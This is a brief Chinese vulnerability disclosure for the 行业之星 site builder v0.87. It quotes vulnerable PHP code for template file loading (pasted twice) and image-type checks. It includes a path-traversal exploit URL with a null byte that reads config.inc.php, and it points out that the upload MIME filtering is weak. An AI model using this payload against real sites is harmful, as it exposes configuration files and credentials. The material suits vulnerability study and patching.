from:90sec.org Micropoor
|
//template_edit.php
function load_library($curr_template, $lib_name)
{
$lib_name = str_replace("0xa", '', $lib_name); // 过滤 0xa 非法字符
if($lib_name == 'style')
{
$lib_file = '../templates/user_themes/' . $curr_template . '/'.$lib_name.'.css';
}
else
{
$lib_file = '../templates/user_themes/' . $curr_template . '/'.$lib_name.'.html';
}
$arr['html'] = str_replace("xEFxBBxBF", '', file_get_contents($lib_file));
return $arr;
}
|
严格说不应该算是包含。只是获取。条件如下:
|
//template_edit.php
function load_library($curr_template, $lib_name)
{
$lib_name = str_replace("0xa", '', $lib_name); // 过滤 0xa 非法字符
if($lib_name == 'style')
{
$lib_file = '../templates/user_themes/' . $curr_template . '/'.$lib_name.'.css';
}
else
{
$lib_file = '../templates/user_themes/' . $curr_template . '/'.$lib_name.'.html';
}
$arr['html'] = str_replace("xEFxBBxBF", '', file_get_contents($lib_file));
return $arr;
}
|
利用方法:
http://127.0.0.1/admin/template_edit.php?template_file=/../../../config.inc.php%00
|
// cls_image.php
// 部分代码
var $error_no = 0;
var $error_msg = '';
var $images_dir = 'images';
var $data_dir = 'data';
var $bgcolor = '';
var $type_maping = array(1 => 'image/gif', 2 => 'image/jpeg', 3 => 'image/png',4 =>'text/plain',5 => 'application/x-zip-compressed',6 => 'image/pjpeg',7=>'application/octet-stream',8=>'image/x-png',9=> 'application/msword');
//略
function check_file_type($img_type) {
return $img_type == 'image/pjpeg' ||
$img_type == 'image/x-png' ||
$img_type == 'image/png' ||
$img_type == 'image/gif' ||
$img_type == 'image/jpeg' ||
$img_type == 'text/plain' ||
$img_type == 'application/x-zip-compressed' ||
$img_type == 'application/x-shockwave-flash' ||
$img_type == 'application/octet-stream' ||
$img_type == 'application/msword';
}
function check_img_type($img_type)
{
return $img_type == 'image/pjpeg' ||
$img_type == 'image/x-png' ||
$img_type == 'image/png' ||
$img_type == 'image/gif' ||
$img_type == 'application/x-shockwave-flash' ||
$img_type == 'image/jpeg' ;
}
//略
|
这种验证不太好吧。。。
文章来源于lcx.cc:行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞
评论